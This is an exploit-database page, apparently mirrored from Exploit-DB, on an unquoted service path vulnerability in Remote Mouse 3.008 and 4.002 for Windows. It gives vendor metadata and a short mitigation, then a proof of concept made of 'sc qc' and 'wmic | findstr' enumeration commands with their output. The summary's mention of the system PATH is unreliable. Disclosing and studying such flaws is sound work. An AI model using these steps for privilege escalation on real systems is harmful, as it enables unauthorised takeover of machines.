header-logo
Suggest Exploit
vendor:
Remote Mouse
by:
Salman Asad (@deathflash1411) a.k.a LeoBreaker
5.5
CVSS
MEDIUM
Unquoted Service Path
426
CWE
Product Name: Remote Mouse
Affected Version From: 3.008
Affected Version To: 4.002
Patch Exists: NO
Related CWE:
CPE: a:remotemouse:remotemouse:3.008
Metasploit:
Other Scripts:
Platforms Tested: Windows
2021

Remote Mouse 4.002 – Unquoted Service Path

The Remote Mouse service in version 4.002 of the Remote Mouse software for Windows has an unquoted service path vulnerability. This vulnerability could allow an attacker to escalate privileges by placing a malicious executable in a higher directory in the system's PATH environment variable.

Mitigation:

To mitigate this vulnerability, the vendor should update the software to include quotes around the service path in the service configuration. Users should also ensure they are using the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: Remote Mouse 4.002 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 03.09.2021
# Software Link: https://www.remotemouse.net/downloads/RemoteMouse.exe
# Vendor Homepage: https://www.remotemouse.net/
# Version: Remote Mouse 3.008 & 4.002
# Tested on: Windows 10

# Proof of Concept:

C:\Users\death>sc qc RemoteMouseService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: RemoteMouseService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : RemoteMouseService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
RemoteMouseService		RemoteMouseService		C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe		Auto

Navigation

Suggest Exploit

Services By CQR